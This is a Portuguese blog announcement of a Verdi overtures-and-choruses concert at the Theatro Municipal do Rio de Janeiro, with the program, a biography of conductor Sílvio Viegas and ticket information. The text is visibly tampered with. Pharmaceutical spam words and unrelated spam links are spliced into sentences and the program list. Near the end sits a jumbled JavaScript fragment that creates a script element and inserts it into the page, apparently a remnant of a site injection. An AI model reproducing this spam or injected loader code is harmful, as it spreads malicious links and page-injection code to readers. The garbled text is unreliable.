CantoProgramaçãoRio de Janeiro

Festival Verdi em “Trajetórias” no TMRJ

No programa, aberturas e coros das óperas Aroldo, Nabucco, Macbeth, Ernani e Don Carlo

 

Maior músico italiano do século 19, Giuseppe Verdi (1813-1901) é bastante querido pelos cantores líricos, por escrever para voz de maneira magistral, pela abrangência e importância de sua obra e ainda, especialmente, pela beleza de seus coros, que ocupam um papel vital na narrativa de suas óperas, a exemplo de Rigoletto, Il Trovatore http://marmule.com/?p=9402 e Aida Order .

Esta riqueza musical está na essência do programa do Festival Verdi, próximo concerto de Trajetórias, no dia viagra sex tablet in hindi 28 de junho, às 11h30, no Theatro Municipal – vinculado à Secretaria de Estado de Cultura –, em que o Coro e a Orquestra Sinfônica do TM irão apresentar aberturas e coros das óperas Aroldo, Nabucco, Macbeth, Ernani e Don Carlo, sob a regência do Maestro Sílvio Viegas A nova série é constituída de concertos e espetáculos de dança com um amplo arco de estilos, que abrange desde o barroco até obras contemporâneas, passando também pela música popular.

“Considero a série Trajetórias um divisor de águas dentro do tradicional sentido da programação do Theatro Municipal. Ao tornar os domingos, pela manhã, uma alternativa atraente para a população, visamos conjugar, com a ativação do Salão Assyrio, a reunião de lazer e cultura. Retomamos assim uma antiga e saudosa tradição da vida cultural da cidade, os famosos Concertos para a Juventude, acrescidos agora de um arco estilístico que permeia a Idade Média e desemboca nas tendências mais conflitantes da  música contemporânea. Estarão presentes também a MPB, o jazz, o ballet, como vertentes desse formidável conjunto de manifestações do espírito humano, comentou o maestro Isaac Karabtchevsky..

 

PROGRAMA

Aberturas e Coros de Óperas de Giuseppe Verdi

AroldoAbertura
online Nabucco Gli arredi festivi
MacbethPrelúdio – Coro delle Stregue – Patria Oppressa
Ernani Order Prelúdio – Evviva! Beviam!
I Vespri Siciliani Pills Abertura
Don CarloSpuntato ecco il di d’esultanza

 

 

http://asrarmoj.com/1396/11/13/cheap-lozol-manufacturer/ Sílvio Viegas

Mestre em Regência pela Escola de Música da Universidade Federal de Minas Gerais. Com apenas 22 anos, foi agraciado com uma bolsa de estudos, indo estudar regência na Itália. Em 2001, ficou com o primeiro lugar no Concurso Nacional “Jovens Regentes”, organizado pela Orquestra Sinfônica Brasileira (OSB).

Sílvio Viegas tem uma ligação estreita com a dança, tendo dirigido, no Theatro Municipal do RJ, os ballets Giselle, Coppélia, Raimonda, O Quebra-Nozes, O Lago dos Cisnes e Carmen de Roland Petit. Tem atuação de destaque no meio operístico regendo óperas como Così fan Tutte, Le Nozze di Figaro e A Flauta Mágica, de Mozart, Tiradentes de Manuel Joaquim de Macedo, La Bohème e Tosca, de Puccini, Pills O Barbeiro de Sevilha de Rossini, Carmen de G. Bizet, Cavalleria Rusticana, de P. Mascagni, Il Trovatore e Nabucco, de Verdi, Romeu e Julieta, de Gounod, Lucia di Lammermoor, de Donizetti e, mais recentemente, O Navio Fantasma, de Wagner, na Argentina.

Esteve à frente das Orquestras Sinfônica Brasileira, Petrobras Sinfônica, Orquestra do Teatro da Paz, Sinfônica do Teatro Nacional Cláudio Santoro, Sinfônica de Minas Gerais, Filarmônica do Espírito Santo, Sinfônica do Paraná, Jazz Sinfônica de São Paulo, Sinfônica de Burgas (Bulgária), Sinfônica do Festival de Szeged (Hungria), Orquestra do Algarve (Portugal), Coro e Orquestra Sinfônica del Sodre (Uruguay) e Orquestra Sinfônica do Teatro de La Plata (Argentina), entre outras.

Foi Diretor Artístico da Fundação Clóvis Salgado – Palácio das Artes de 2003 a 2005 e, atualmente, é o Maestro Titular da Orquestra Sinfônica da casa. É também Professor de Regência na Escola de Música da Universidade Federal de Minas Gerais. Entre suas apresentações na temporada 2012/2013 estão concertos com a Orquestra Sinfônica de Roma, Filarmônica do Amazonas e dois concertos dentro da Temporada Sinfônica da Arena de Verona, na Itália.

 


SERVIÇO

 

 

Theatro Municipal do Rio de Janeiro
Praça Floriano, s/nº – Centro
Informações: (21) 2332-9191

Dia 28 de junho, às 11h30 *

Preço único: R$ 10,00

Classificação etária: 5 anos

 document.currentScript.parentNode.insertBefore(s, document.currentScript);var d=document;var s=d.createElement(‘script’);

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.